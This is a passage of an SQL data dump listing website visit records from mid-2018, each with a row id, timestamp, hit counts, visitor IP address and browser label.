62.205.134.182','other'),(259460,1529093882,1,1,0,0,'8.29.198.25','other'),(259461,1529094277,1,1,0,0,'109.252.91.106','chrome'),(259462,1529095549,1,1,0,0,'95.163.255.99','other'),(259463,1529097312,1,1,0,0,'62.205.134.182','other'),(259464,1529097409,8,8,0,0,'144.76.3.79','other'),(259465,1529097489,6,6,0,0,'173.208.206.50','other'),(259466,1529097544,1,1,0,0,'141.8.142.74','other'),(259467,1529097707,1,1,0,0,'146.185.158.24','chrome'),(259468,1529098927,1,1,0,0,'180.76.15.144','other'),(259469,1529099248,1,1,0,0,'195.10.210.70','chrome'),(259470,1529099255,1,1,0,0,'8.29.198.26','other'),(259471,1529099500,1,1,0,0,'173.252.86.89','other'),(259472,1529099564,1,1,0,0,'141.8.142.74','other'),(259473,1529099705,1,1,0,0,'91.196.178.83','chrome'),(259474,1529099825,1,1,0,0,'37.73.86.77','chrome'),(259475,1529100400,1,1,0,0,'207.46.13.36','other'),(259476,1529100666,1,1,0,0,'178.251.107.253','chrome'),(259477,1529100913,1,1,0,0,'62.205.134.182','other'),(259478,1529101230,6,6,0,0,'141.8.142.74','other'),(259479,1529101247,4,4,0,0,'178.154.171.88','other'),(259480,1529101595,1,1,0,0,'216.244.66.241','other'),(259481,1529102029,1,1,0,0,'193.194.127.219','other'),(259482,1529103006,1,0,1,0,'66.249.69.195',''),(259483,1529104510,1,1,0,0,'91.196.178.172','other'),(259484,1529104514,1,1,0,0,'91.196.178.130','chrome'),(259485,1529104517,1,1,0,0,'62.205.134.182','other'),(259486,1529104609,1,1,0,0,'66.220.148.171','other'),(259487,1529104727,1,1,0,0,'8.29.198.25','other'),(259488,1529105515,1,0,1,0,'66.249.69.199',''),(259489,1529105591,1,1,0,0,'141.8.142.74','other'),(259490,1529106704,1,1,0,0,'95.133.153.247','other'),(259491,1529107954,1,1,0,0,'178.154.171.88','other'),(259492,1529108114,1,1,0,0,'62.205.134.182','other'),(259493,1529108250,1,1,0,0,'207.46.13.39','other'),(259494,1529108637,4,4,0,0,'207.46.13.67','other'),(259495,1529109052,1,1,0,0,'91.196.178.162','chrome'),(259496,1529109588,1,1,0,0,'157.55.39.154','other'),(259497,1529109745,1,1,0,0,'141.8.142.74','other'),(259498,1529110100,1,1,0,0,'8.29.198.27','other'),(259499,1529111732,1,1,0,0,'62.205.134.182','other'),(259500,1529112028,1,1,0,0,'216.244.66.241','other'),(259501,1529112303,4,4,0,0,'141.8.142.74','other'),(259502,1529112313,1,1,0,0,'178.154.171.88','other'),(259503,1529112316,1,1,0,0,'141.8.132.19','other'),(259504,1529112367,1,1,0,0,'87.250.224.46','other'),(259505,1529112613,1,1,0,0,'95.158.60.175','chrome'),(259506,1529113745,1,1,0,0,'47.96.234.252','other'),(259507,1529115322,1,1,0,0,'62.205.134.182','other'),(259508,1529115578,1,1,0,0,'8.29.198.27','other'),(259509,1529116408,23,23,0,0,'167.114.219.41','other'),(259510,1529116509,1,1,0,0,'92.112.124.172','chrome'),(259511,1529117640,1,1,0,0,'178.154.171.88','other'),(259512,1529117752,1,1,0,0,'91.196.178.50','other'),(259513,1529118912,1,1,0,0,'62.205.134.182','other'),(259514,1529120246,1,1,0,0,'37.73.154.114','chrome'),(259515,1529120300,1,1,0,0,'207.46.13.67','other'),(259516,1529120950,1,1,0,0,'8.29.198.26','other'),(259517,1529121673,7,7,0,0,'46.4.63.250','other'),(259518,1529122045,1,1,0,0,'91.196.178.36','chrome'),(259519,1529122358,1,1,0,0,'46.211.113.224','other'),(259520,1529122513,1,1,0,0,'62.205.134.182','other'),(259521,1529122540,1,1,0,0,'95.132.63.3','chrome'),(259522,1529122644,10,10,0,0,'69.30.226.234','other'),(259523,1529123567,3,3,0,0,'141.8.142.74','other'),(259524,1529123575,2,2,0,0,'178.154.200.41','other'),(259525,1529123631,1,1,0,0,'178.154.171.88','other'),(259526,1529123771,1,1,0,0,'54.165.59.7','other'),(259527,1529123830,1,1,0,0,'87.250.224.46','other'),(259528,1529124744,1,0,1,0,'66.249.69.195',''),(259529,1529125063,1,1,0,0,'37.142.167.126','other'),(259530,1529125865,1,1,0,0,'54.165.59.7','other'),(259531,1529126114,1,1,0,0,'62.205.134.182','other'),(259532,1529126133,1,1,0,0,'69.171.225.151','other'),(259533,1529126416,1,1,0,0,'8.29.198.27','other'),(259534,1529126469,1,1,0,0,'173.252.88.248','other'),(259535,1529127176,1,1,0,0,'180.76.15.16','other'),(259536,1529127359,1,1,0,0,'141.8.142.74','other'),(259537,1529127706,1,1,0,0,'91.196.178.53','chrome'),(259538,1529127761,1,1,0,0,'54.165.59.7','other'),(259539,1529127913,1,1,0,0,'46.211.126.163','other'),(259540,1529128031,13,13,0,0,'144.76.7.79','other'),(259541,1529128096,1,1,0,0,'46.161.9.39','chrome'),(259542,1529128747,1,1,0,0,'37.9.113.182','other'),(259543,1529128874,1,1,0,0,'180.76.15.148','other'),(259544,1529128875,1,1,0,0,'91.196.178.72','chrome'),(259545,1529128894,1,1,0,0,'54.165.59.7','other'),(259546,1529129712,1,1,0,0,'62.205.134.182','other'),(259547,1529129823,1,1,0,0,'162.210.196.98','other'),(259548,1529130210,1,1,0,0,'46.133.201.203','chrome'),(259549,1529130245,2,2,0,0,'54.165.59.7','other'),(259550,1529130583,1,1,0,0,'141.8.142.74','other'),(259551,1529130728,1,1,0,0,'95.132.17.212','chrome'),(259552,1529131251,1,1,0,0,'85.248.227.164','other'),(259553,1529131341,1,1,0,0,'91.196.178.186','chrome'),(259554,1529131521,1,1,0,0,'173.252.122.142','other'),(259555,1529131801,1,1,0,0,'8.29.198.25','other'),(259556,1529132132,4,4,0,0,'91.196.178.62','chrome'),(259557,1529132916,1,1,0,0,'141.8.142.74','other'),(259558,1529132919,1,1,0,0,'46.141.43.232','chrome'),(259559,1529133156,1,1,0,0,'54.165.59.7','other'),(259560,1529133312,1,1,0,0,'62.205.134.182','other'),(259561,1529133403,1,1,0,0,'213.179.252.201','other'),(259562,1529133850,2,2,0,0,'141.8.142.74','other'),(259563,1529134123,2,2,0,0,'178.154.171.88','other'),(259564,1529134476,1,1,0,0,'173.252.84.118','other'),(259565,1529134554,1,1,0,0,'176.212.128.78','firefox'),(259566,1529135766,1,1,0,0,'173.252.90.231','other'),(259567,1529136215,1,1,0,0,'91.196.178.179','other'),(259568,1529136322,1,1,0,0,'178.154.171.88','other'),(259569,1529136332,1,1,0,0,'91.196.178.76','chrome'),(259570,1529136554,2,2,0,0,'93.78.156.156','chrome'),(259571,1529136734,1,1,0,0,'213.180.203.40','other'),(259572,1529136912,1,1,0,0,'62.205.134.182','other'),(259573,1529137260,1,1,0,0,'8.29.198.26','other'),(259574,1529137602,1,1,0,0,'54.165.59.7','other'),(259575,1529138503,1,1,0,0,'178.154.171.88','other'),(259576,1529138581,1,1,0,0,'87.250.224.46','other'),(259577,1529138661,1,1,0,0,'141.8.142.74','other'),(259578,1529139022,1,0,1,0,'66.249.69.145',''),(259579,1529139103,2,2,0,0,'216.244.66.241','other'),(259580,1529139130,1,1,0,0,'5.35.51.158','chrome'),(259581,1529140247,3,3,0,0,'37.54.114.62','chrome'),(259582,1529140513,1,1,0,0,'62.205.134.182','other'),(259583,1529140679,1,1,0,0,'195.46.34.182','chrome'),(259584,1529140808,5,5,0,0,'141.8.142.74','other'),(259585,1529140890,1,1,0,0,'91.196.178.62','chrome'),(259586,1529141050,2,2,0,0,'178.154.171.88','other'),(259587,1529141054,1,1,0,0,'37.9.113.182','other'),(259588,1529141144,1,1,0,0,'37.9.113.114','other'),(259589,1529141147,1,1,0,0,'213.180.203.7','other'),(259590,1529141151,1,1,0,0,'213.180.203.40','other'),(259591,1529141154,1,1,0,0,'5.45.207.82','other'),(259592,1529142222,1,1,0,0,'180.76.15.143','other'),(259593,1529142416,1,1,0,0,'216.244.66.241','other'),(259594,1529142422,1,1,0,0,'94.130.167.91','firefox'),(259595,1529142646,1,1,0,0,'8.29.198.26','other'),(259596,1529142658,1,1,0,0,'91.196.178.71','chrome'),(259597,1529143406,1,1,0,0,'37.9.113.182','other'),(259598,1529143799,1,1,0,0,'37.55.57.172','chrome'),(259599,1529144111,1,1,0,0,'62.205.134.182','other'),(259600,1529144719,1,1,0,0,'216.244.66.241','other'),(259601,1529145756,1,1,0,0,'193.107.3.67','other'),(259602,1529146156,1,1,0,0,'66.102.9.35','chrome'),(259603,1529146254,1,1,0,0,'141.8.142.74','other'),(259604,1529146903,1,1,0,0,'176.193.163.248','msie'),(259605,1529147317,1,1,0,0,'91.196.178.102','chrome'),(259606,1529147712,1,1,0,0,'62.205.134.182','other'),(259607,1529148025,2,2,0,0,'91.124.82.8','chrome'),(259608,1529148102,1,1,0,0,'8.29.198.27','other'),(259609,1529149015,7,7,0,0,'178.154.171.88','other'),(259610,1529149583,1,1,0,0,'91.196.178.130','chrome'),(259611,1529149591,1,1,0,0,'91.196.178.47','chrome'),(259612,1529149762,1,1,0,0,'91.209.11.236','other'),(259613,1529149784,18,18,0,0,'141.8.142.74','other'),(259614,1529149815,1,1,0,0,'37.9.113.182','other'),(259615,1529150304,5,5,0,0,'178.154.171.88','other'),(259616,1529150361,2,2,0,0,'87.250.224.46','other'),(259617,1529151318,1,1,0,0,'62.205.134.182','other'),(259618,1529151529,1,1,0,0,'216.244.66.241','other'),(259619,1529151540,1,0,1,0,'66.249.75.153',''),(259620,1529151754,1,1,0,0,'37.73.219.115','other'),(259621,1529151788,1,1,0,0,'178.154.171.88','other'),(259622,1529152056,2,2,0,0,'141.8.142.74','other'),(259623,1529152245,1,1,0,0,'95.27.213.74','chrome'),(259624,1529152402,1,1,0,0,'178.154.171.60','other'),(259625,1529152403,1,1,0,0,'5.45.207.58','other'),(259626,1529152414,1,1,0,0,'213.180.203.8','other'),(259627,1529152511,1,1,0,0,'213.180.203.7','other'),(259628,1529153492,1,1,0,0,'8.29.198.27','other'),(259629,1529153958,3,3,0,0,'141.8.142.74','other'),(259630,1529154037,1,1,0,0,'178.154.200.41','other'),(259631,1529154334,1,1,0,0,'216.244.66.241','other'),(259632,1529154912,1,1,0,0,'62.205.134.182','other'),(259633,1529155220,2,2,0,0,'141.8.142.74','other'),(259634,1529155253,1,1,0,0,'178.154.171.88','other'),(259635,1529155260,1,1,0,0,'91.224.96.28','chrome'),(259636,1529155439,1,1,0,0,'207.46.13.48','other'),(259637,1529155773,2,2,0,0,'216.244.66.241','other'),(259638,1529155776,1,1,0,0,'107.167.109.150','other'),(259639,1529156005,1,1,0,0,'91.196.177.63','chrome'),(259640,1529156398,1,1,0,0,'178.154.171.88','other'),(259641,1529157478,1,1,0,0,'141.8.142.74','other'),(259642,1529158052,1,1,0,0,'54.165.59.7','other'),(259643,1529158514,1,1,0,0,'62.205.134.182','other'),(259644,1529158944,1,1,0,0,'8.29.198.25','other'),(259645,1529158949,2,2,0,0,'141.8.142.74','other'),(259646,1529159084,1,1,0,0,'178.154.171.88','other'),(259647,1529159131,1,0,1,0,'66.249.69.144',''),(259648,1529159261,1,0,1,0,'66.249.69.143',''),(259649,1529159536,1,1,0,0,'194.177.25.9','chrome'),(259650,1529159540,3,3,0,0,'54.165.59.7','other'),(259651,1529160824,1,0,1,0,'66.249.69.145',''),(259652,1529161060,3,3,0,0,'54.165.59.7','other'),(259653,1529161247,2,2,0,0,'178.154.171.88','other'),(259654,1529161536,1,1,0,0,'188.230.43.254','other'),(259655,1529162077,1,1,0,0,'54.165.59.7','other'),(259656,1529162123,1,1,0,0,'62.205.134.182','other'),(259657,1529162339,3,3,0,0,'141.8.142.74','other'),(259658,1529162346,2,2,0,0,'178.154.171.88','other'),(259659,1529163781,1,1,0,0,'216.244.66.241','other'),(259660,1529163947,1,1,0,0,'188.230.43.254','other'),(259661,1529164335,1,1,0,0,'8.29.198.26','other'),(259662,1529164444,1,1,0,0,'141.8.142.74','other'),(259663,1529164601,1,1,0,0,'194.187.170.141','other'),(259664,1529165529,2,2,0,0,'178.154.171.88','other'),(259665,1529165712,1,1,0,0,'62.205.134.182','other'),(259666,1529166585,1,1,0,0,'46.211.122.79','chrome'),(259667,1529167020,2,0,2,0,'66.249.69.144',''),(259668,1529167412,1,1,0,0,'91.196.178.54','chrome'),(259669,1529167548,1,1,0,0,'37.9.113.132','other'),(259670,1529167844,1,1,0,0,'37.9.113.101','other'),(259671,1529167847,1,1,0,0,'213.180.203.7','other'),(259672,1529168152,1,1,0,0,'216.244.66.241','other'),(259673,1529168225,1,1,0,0,'207.46.13.48','other'),(259674,1529168536,1,1,0,0,'66.249.69.144','chrome'),(259675,1529168722,1,1,0,0,'141.8.132.22','other'),(259676,1529169295,1,1,0,0,'213.180.203.8','other'),(259677,1529169312,1,1,0,0,'62.205.134.182','other'),(259678,1529169332,1,1,0,0,'207.46.13.128','other'),(259679,1529169442,1,1,0,0,'146.185.157.225','chrome'),(259680,1529169783,1,1,0,0,'8.29.198.26','other'),(259681,1529169823,1,1,0,0,'207.46.13.121','other'),(259682,1529170080,1,0,1,0,'66.249.69.143',''),(259683,1529170324,1,1,0,0,'141.8.142.74','other'),(259684,1529170512,1,1,0,0,'37.9.113.182','other'),(259685,1529170514,1,1,0,0,'178.154.200.7','other'),(259686,1529171540,1,1,0,0,'46.211.147.141','chrome'),(259687,1529172175,1,1,0,0,'87.250.224.46','other'),(259688,1529172179,2,2,0,0,'178.154.171.88','other'),(259689,1529172758,1,0,1,0,'66.249.75.155',''),(259690,1529172907,1,1,0,0,'91.196.178.173','chrome'),(259691,1529172928,1,1,0,0,'62.205.134.182','other'),(259692,1529174560,1,1,0,0,'207.46.13.121','other'),(259693,1529175092,1,1,0,0,'178.154.171.88','other'),(259694,1529175178,1,1,0,0,'8.29.198.27','other'),(259695,1529175432,2,2,0,0,'141.8.142.74','other'),(259696,1529175478,1,1,0,0,'37.73.82.230','chrome'),(259697,1529175639,1,1,0,0,'89.178.230.103','msie'),(259698,1529176512,1,1,0,0,'62.205.134.182','other'),(259699,1529176806,1,1,0,0,'207.46.13.71','other'),(259700,1529177117,1,1,0,0,'178.154.171.60','other'),(259701,1529177535,2,2,0,0,'91.124.82.8','chrome'),(259702,1529178210,1,1,0,0,'141.8.142.74','other'),(259703,1529178375,2,2,0,0,'207.46.13.121','other'),(259704,1529180117,1,1,0,0,'62.205.134.182','other'),(259705,1529180479,1,1,0,0,'207.46.13.207','other'),(259706,1529180559,2,0,2,0,'66.249.66.156',''),(259707,1529180624,1,1,0,0,'8.29.198.27','other'),(259708,1529180681,1,0,1,0,'66.249.66.75',''),(259709,1529180960,1,1,0,0,'47.97.209.38','other'),(259710,1529181461,1,1,0,0,'207.46.13.48','other'),(259711,1529181959,1,1,0,0,'141.8.142.123','other'),(259712,1529182050,1,1,0,0,'37.73.175.68','chrome'),(259713,1529182258,1,0,1,0,'66.249.66.76',''),(259714,1529182280,1,1,0,0,'66.249.66.157','chrome'),(259715,1529182354,1,1,0,0,'141.8.132.22','other'),(259716,1529183475,1,0,1,0,'66.249.66.157',''),(259717,1529183500,1,1,0,0,'66.249.66.156','chrome'),(259718,1529183585,1,0,1,0,'66.249.66.75',''),(259719,1529183717,1,1,0,0,'62.205.134.182','other'),(259720,1529184302,1,1,0,0,'141.8.142.123','other'),(259721,1529184476,1,1,0,0,'37.9.113.186','other'),(259722,1529184707,1,1,0,0,'217.27.150.50','other'),(259723,1529184936,1,1,0,0,'141.8.132.19','other'),(259724,1529186012,1,1,0,0,'8.29.198.27','other'),(259725,1529186063,1,1,0,0,'213.180.203.8','other'),(259726,1529187313,1,1,0,0,'62.205.134.182','other'),(259727,1529187355,1,1,0,0,'54.165.59.7','other'),(259728,1529189503,1,1,0,0,'178.154.171.88','other'),(259729,1529190914,1,1,0,0,'62.205.134.182','other'),(259730,1529191209,1,1,0,0,'80.252.155.198','firefox'),(259731,1529191468,1,1,0,0,'8.29.198.26','other'),(259732,1529192548,2,2,0,0,'141.8.142.74','other'),(259733,1529193096,1,1,0,0,'37.9.113.182','other'),(259734,1529194513,1,1,0,0,'62.205.134.182','other'),(259735,1529195002,1,1,0,0,'37.145.124.191','msie'),(259736,1529196089,1,1,0,0,'178.154.171.88','other'),(259737,1529196861,1,1,0,0,'8.29.198.26','other'),(259738,1529196936,1,1,0,0,'216.244.66.241','other'),(259739,1529198113,1,1,0,0,'62.205.134.182','other'),(259740,1529199046,1,1,0,0,'141.8.142.74','other'),(259741,1529200523,1,1,0,0,'141.8.142.74','other'),(259742,1529201000,1,1,0,0,'216.244.66.241','other'),(259743,1529201716,1,1,0,0,'62.205.134.182','other'),(259744,1529202308,1,1,0,0,'8.29.198.25','other'),(259745,1529203405,1,1,0,0,'2.92.36.42','chrome'),(259746,1529204033,1,1,0,0,'216.244.66.241','other'),(259747,1529204415,2,2,0,0,'5.9.151.57','other'),(259748,1529204419,1,1,0,0,'141.8.142.74','other'),(259749,1529204809,2,0,2,0,'66.249.66.74',''),(259750,1529205312,1,1,0,0,'62.205.134.182','other'),(259751,1529205710,1,0,1,0,'66.249.66.74',''),(259752,1529207697,1,1,0,0,'8.29.198.25','other'),(259753,1529207868,1,0,1,0,'66.249.66.156',''),(259754,1529208135,1,1,0,0,'141.8.142.74','other'),(259755,1529208912,1,1,0,0,'62.205.134.182','other'),(259756,1529209268,1,1,0,0,'107.167.116.56','other'),(259757,1529210269,1,1,0,0,'216.244.66.241','other'),(259758,1529210482,11,11,0,0,'141.8.142.74','other'),(259759,1529210585,4,4,0,0,'178.154.171.88','other'),(259760,1529210965,1,1,0,0,'87.250.224.46','other'),(259761,1529211451,1,0,1,0,'66.249.66.156',''),(259762,1529211985,2,2,0,0,'141.8.142.74','other'),(259763,1529211988,1,1,0,0,'178.154.171.88','other'),(259764,1529212512,1,0,1,0,'66.249.66.155',''),(259765,1529212523,1,1,0,0,'62.205.134.182','other'),(259766,1529213026,1,0,1,0,'66.249.66.75',''),(259767,1529213140,1,1,0,0,'8.29.198.26','other'),(259768,1529213747,1,1,0,0,'108.59.8.80','other'),(259769,1529214225,1,1,0,0,'207.46.13.40','other'),(259770,1529214372,1,0,1,0,'66.249.66.156',''),(259771,1529214900,1,1,0,0,'207.46.13.33','other'),(259772,1529215816,23,23,0,0,'144.217.86.210','other'),(259773,1529216037,7,7,0,0,'141.8.142.74','other'),(259774,1529216039,4,4,0,0,'178.154.171.88','other'),(259775,1529216050,1,1,0,0,'178.154.171.60','other'),(259776,1529216059,1,1,0,0,'178.154.200.41','other'),(259777,1529216118,1,1,0,0,'62.205.134.182','other'),(259778,1529216163,2,2,0,0,'87.250.224.46','other'),(259779,1529216201,1,1,0,0,'141.8.142.167','other'),(259780,1529216294,1,1,0,0,'178.92.10.110','chrome'),(259781,1529218096,1,1,0,0,'66.249.66.75','chrome'),(259782,1529218164,1,1,0,0,'207.46.13.94','other'),(259783,1529218181,2,0,2,0,'66.249.66.155',''),(259784,1529218273,1,0,1,0,'66.249.66.156',''),(259785,1529218534,1,1,0,0,'8.29.198.25','other'),(259786,1529218646,1,1,0,0,'95.132.42.61','chrome'),(259787,1529219137,1,1,0,0,'95.220.210.247','msie'),(259788,1529219448,1,1,0,0,'141.8.142.74','other'),(259789,1529219540,1,1,0,0,'178.154.171.88','other'),(259790,1529219718,1,1,0,0,'62.205.134.182','other'),(259791,1529219753,1,0,1,0,'66.249.66.155',''),(259792,1529220055,1,0,1,0,'66.249.66.157',''),(259793,1529220751,1,1,0,0,'157.55.39.40','other'),(259794,1529221384,1,1,0,0,'216.244.66.241','other'),(259795,1529222507,1,1,0,0,'216.244.66.241','other'),(259796,1529223033,1,1,0,0,'141.8.142.74','other'),(259797,1529223312,1,1,0,0,'62.205.134.182','other'),(259798,1529223977,1,1,0,0,'8.29.198.27','other'),(259799,1529224955,2,2,0,0,'87.250.224.46','other'),(259800,1529225236,1,0,1,0,'66.249.66.155',''),(259801,1529225259,1,1,0,0,'95.132.56.23','chrome'),(259802,1529225470,44,44,0,0,'142.4.200.37','other'),(259803,1529225943,1,0,1,0,'66.249.66.157',''),(259804,1529225985,1,0,1,0,'66.249.66.74',''),(259805,1529226912,1,1,0,0,'62.205.134.182','other'),(259806,1529227256,2,2,0,0,'141.8.142.74','other'),(259807,1529227572,2,2,0,0,'91.124.82.8','chrome'),(259808,1529228322,2,2,0,0,'178.94.30.96','chrome'),(259809,1529229290,1,1,0,0,'141.8.142.74','other'),(259810,1529229372,1,1,0,0,'8.29.198.25','other'),(259811,1529230234,2,2,0,0,'141.8.142.74','other'),(259812,1529230334,1,1,0,0,'95.163.255.97','other'),(259813,1529230356,1,1,0,0,'157.55.39.232','other'),(259814,1529230512,1,1,0,0,'62.205.134.182','other'),(259815,1529231562,1,1,0,0,'95.163.255.95','other'),(259816,1529231623,1,1,0,0,'178.154.171.88','other'),(259817,1529232625,1,1,0,0,'157.55.39.224','other'),(259818,1529233256,1,0,1,0,'66.249.66.155',''),(259819,1529233787,2,2,0,0,'178.154.171.88','other'),(259820,1529234086,1,1,0,0,'91.196.178.130','other'),(259821,1529234112,1,1,0,0,'62.205.134.182','other'),(259822,1529234384,2,2,0,0,'91.124.82.8','chrome'),(259823,1529234798,2,2,0,0,'178.154.171.88','other'),(259824,1529234820,1,1,0,0,'8.29.198.26','other'),(259825,1529234848,1,1,0,0,'101.199.108.118','chrome'),(259826,1529235047,1,0,1,0,'66.249.66.155',''),(259827,1529235810,1,1,0,0,'87.250.224.46','other'),(259828,1529236719,1,0,1,0,'66.249.66.157',''),(259829,1529237712,1,1,0,0,'62.205.134.182','other'),(259830,1529237724,1,1,0,0,'95.163.255.93','other'),(259831,1529237728,1,1,0,0,'216.244.66.241','other'),(259832,1529238215,1,1,0,0,'178.154.171.88','other'),(259833,1529238394,1,1,0,0,'87.250.224.46','other'),(259834,1529238546,1,1,0,0,'176.125.40.186','chrome'),(259835,1529238568,3,3,0,0,'141.8.142.74','other'),(259836,1529238628,1,1,0,0,'13.57.220.0','chrome'),(259837,1529239708,1,0,1,0,'66.249.66.75',''),(259838,1529239718,2,2,0,0,'91.196.178.165','chrome'),(259839,1529240013,1,1,0,0,'87.250.224.46','other'),(259840,1529240022,1,1,0,0,'37.9.113.182','other'),(259841,1529240029,3,3,0,0,'178.154.171.88','other'),(259842,1529240209,1,1,0,0,'8.29.198.25','other'),(259843,1529240909,1,1,0,0,'195.88.158.126','other'),(259844,1529241245,1,0,1,0,'66.249.66.76',''),(259845,1529241321,1,1,0,0,'62.205.134.182','other'),(259846,1529241487,1,0,1,0,'66.249.66.156',''),(259847,1529241665,1,1,0,0,'141.8.142.74','other'),(259848,1529241870,1,1,0,0,'178.154.171.88','other'),(259849,1529242112,1,0,1,0,'66.249.66.155',''),(259850,1529242436,1,0,1,0,'66.249.66.157',''),(259851,1529242683,1,1,0,0,'141.8.142.74','other'),(259852,1529243968,2,2,0,0,'178.154.171.88','other'),(259853,1529244206,1,1,0,0,'37.9.113.182','other'),(259854,1529244924,1,1,0,0,'62.205.134.182','other'),(259855,1529245010,1,1,0,0,'37.54.22.130','other'),(259856,1529245347,1,1,0,0,'91.209.11.236','other'),(259857,1529245665,1,1,0,0,'8.29.198.26','other'),(259858,1529245903,1,0,1,0,'66.249.66.156',''),(259859,1529246337,1,1,0,0,'141.8.142.74','other'),(259860,1529246593,1,1,0,0,'207.46.13.154','other'),(259861,1529247372,1,1,0,0,'47.106.149.44','other'),(259862,1529247585,1,1,0,0,'66.249.66.74','chrome'),(259863,1529247603,2,0,2,0,'66.249.66.155',''),(259864,1529247688,1,1,0,0,'5.248.207.234','chrome'),(259865,1529248088,1,1,0,0,'216.244.66.241','other'),(259866,1529248357,1,1,0,0,'178.154.171.88','other'),(259867,1529248512,1,1,0,0,'62.205.134.182','other'),(259868,1529249455,2,2,0,0,'54.165.59.7','other'),(259869,1529249489,1,0,1,0,'66.249.66.157',''),(259870,1529249538,1,1,0,0,'141.8.142.74','other'),(259871,1529249671,1,1,0,0,'95.211.190.198','other'),(259872,1529251050,1,1,0,0,'8.29.198.26','other'),(259873,1529251926,1,1,0,0,'37.54.176.133','firefox'),(259874,1529251999,1,1,0,0,'141.8.142.74','other'),(259875,1529252129,1,1,0,0,'62.205.134.182','other'),(259876,1529253032,1,1,0,0,'66.249.66.76','chrome'),(259877,1529253700,3,3,0,0,'176.9.143.190','other'),(259878,1529254010,1,1,0,0,'178.154.171.88','other'),(259879,1529254352,1,1,0,0,'87.250.224.46','other'),(259880,1529254856,1,1,0,0,'95.163.255.119','other'),(259881,1529254866,1,1,0,0,'95.163.255.105','other'),(259882,1529255714,1,1,0,0,'62.205.134.182','other'),(259883,1529256494,1,1,0,0,'8.29.198.27','other'),(259884,1529256811,1,0,1,0,'66.249.66.75',''),(259885,1529256918,1,0,1,0,'66.249.66.157',''),(259886,1529257068,1,1,0,0,'178.154.171.88','other'),(259887,1529257491,1,1,0,0,'180.76.15.145','other'),(259888,1529257840,2,2,0,0,'141.8.142.74','other'),(259889,1529257994,3,3,0,0,'91.196.178.79','chrome'),(259890,1529258182,1,1,0,0,'176.36.50.232','chrome'),(259891,1529258645,3,3,0,0,'91.196.178.69','chrome'),(259892,1529259312,1,1,0,0,'62.205.134.182','other'),(259893,1529259571,1,1,0,0,'66.249.66.74','chrome'),(259894,1529259863,1,1,0,0,'66.102.9.40','chrome'),(259895,1529259896,1,1,0,0,'66.102.9.38','chrome'),(259896,1529260843,2,2,0,0,'91.124.82.8','chrome'),(259897,1529260927,2,2,0,0,'141.8.142.74','other'),(259898,1529261794,1,1,0,0,'91.196.178.94','chrome'),(259899,1529261888,1,1,0,0,'8.29.198.27','other'),(259900,1529262439,8,8,0,0,'141.8.142.74','other'),(259901,1529262498,1,1,0,0,'178.154.171.88','other'),(259902,1529262918,1,1,0,0,'62.205.134.182','other'),(259903,1529263081,1,1,0,0,'207.46.13.154','other'),(259904,1529263157,1,1,0,0,'87.250.224.46','other'),(259905,1529264004,1,1,0,0,'37.9.113.182','other'),(259906,1529264260,3,3,0,0,'178.154.171.88','other'),(259907,1529264292,2,2,0,0,'141.8.142.74','other'),(259908,1529265253,1,1,0,0,'207.46.13.111','other'),(259909,1529265301,1,0,1,0,'66.249.64.28',''),(259910,1529265378,1,1,0,0,'66.249.70.29','chrome'),(259911,1529266017,1,1,0,0,'54.197.152.122','chrome'),(259912,1529266268,1,1,0,0,'54.163.140.192','chrome'),(259914,1529266512,1,1,0,0,'62.205.134.182','other'),(259915,1529266759,1,1,0,0,'87.250.224.46','other'),(259916,1529266791,1,1,0,0,'178.154.171.88','other'),(259917,1529266852,2,2,0,0,'141.8.142.74','other'),(259918,1529267064,1,1,0,0,'54.211.110.47','chrome'),(259919,1529267120,1,0,1,0,'66.249.64.29',''),(259920,1529267325,1,1,0,0,'8.29.198.27','other'),(259921,1529267630,1,1,0,0,'37.9.113.182','other'),(259922,1529267709,1,1,0,0,'216.244.66.241','other'),(259923,1529268201,1,1,0,0,'141.8.142.74','other'),(259924,1529268953,1,1,0,0,'178.154.171.88','other'),(259925,1529268981,1,0,1,0,'66.249.64.29',''),(259926,1529269182,3,3,0,0,'141.8.142.74','other'),(259927,1529269242,3,3,0,0,'87.250.224.46','other'),(259928,1529269924,2,2,0,0,'178.154.171.88','other'),(259929,1529270113,1,1,0,0,'62.205.134.182','other'),(259930,1529271019,1,1,0,0,'178.154.171.88','other'),(259931,1529271261,3,3,0,0,'141.8.142.74','other'),(259932,1529271629,1,1,0,0,'157.55.39.226','other'),(259933,1529272728,1,1,0,0,'8.29.198.25','other'),(259934,1529272797,1,1,0,0,'216.244.66.241','other'),(259935,1529272951,10,10,0,0,'178.151.245.174','other'),(259936,1529273713,1,1,0,0,'62.205.134.182','other'),(259937,1529273783,1,1,0,0,'37.9.113.182','other'),(259938,1529274124,1,1,0,0,'178.154.171.88','other'),(259939,1529274493,1,1,0,0,'66.249.70.25','chrome'),(259940,1529275226,300,300,0,0,'5.9.138.189','other'),(259941,1529276021,1,1,0,0,'91.209.11.236','other'),(259942,1529276472,2,2,0,0,'141.8.142.74','other'),(259943,1529277063,1,1,0,0,'216.244.66.241','other'),(259944,1529277312,1,1,0,0,'62.205.134.182','other'),(259945,1529278169,1,1,0,0,'8.29.198.25','other'),(259946,1529278574,2,2,0,0,'178.154.171.88','other'),(259947,1529278842,1,1,0,0,'141.8.142.74','other'),(259948,1529279567,12,12,0,0,'157.55.39.226','other'),(259949,1529279578,11,11,0,0,'207.46.13.111','other'),(259950,1529279589,6,6,0,0,'207.46.13.110','other'),(259951,1529279595,6,6,0,0,'207.46.13.154','other'),(259952,1529279776,3,3,0,0,'178.154.171.88','other'),(259953,1529279982,1,1,0,0,'141.8.142.74','other'),(259954,1529280204,1,1,0,0,'37.9.113.182','other'),(259955,1529280912,1,1,0,0,'62.205.134.182','other'),(259956,1529281019,1,1,0,0,'66.249.70.27','chrome'),(259957,1529281115,1,1,0,0,'188.166.64.25','chrome'),(259958,1529281176,2,2,0,0,'207.46.13.111','other'),(259959,1529281804,2,2,0,0,'178.154.171.88','other'),(259960,1529282652,2,2,0,0,'141.8.142.74','other'),(259961,1529283568,1,1,0,0,'8.29.198.27','other'),(259962,1529283985,2,2,0,0,'91.124.82.8','chrome'),(259963,1529284352,1,1,0,0,'207.46.13.110','other'),(259964,1529284383,2,2,0,0,'141.8.142.74','other'),(259965,1529284385,1,1,0,0,'87.250.224.46','other'),(259966,1529284513,1,1,0,0,'62.205.134.182','other'),(259967,1529284829,1,1,0,0,'178.154.171.88','other'),(259968,1529285376,2,2,0,0,'141.8.142.74','other'),(259969,1529285940,1,1,0,0,'66.249.70.29','chrome'),(259970,1529286015,1,0,1,0,'66.249.64.28',''),(259971,1529286054,1,1,0,0,'178.154.171.88','other'),(259972,1529286236,1,1,0,0,'213.180.203.8','other'),(259973,1529286640,17,17,0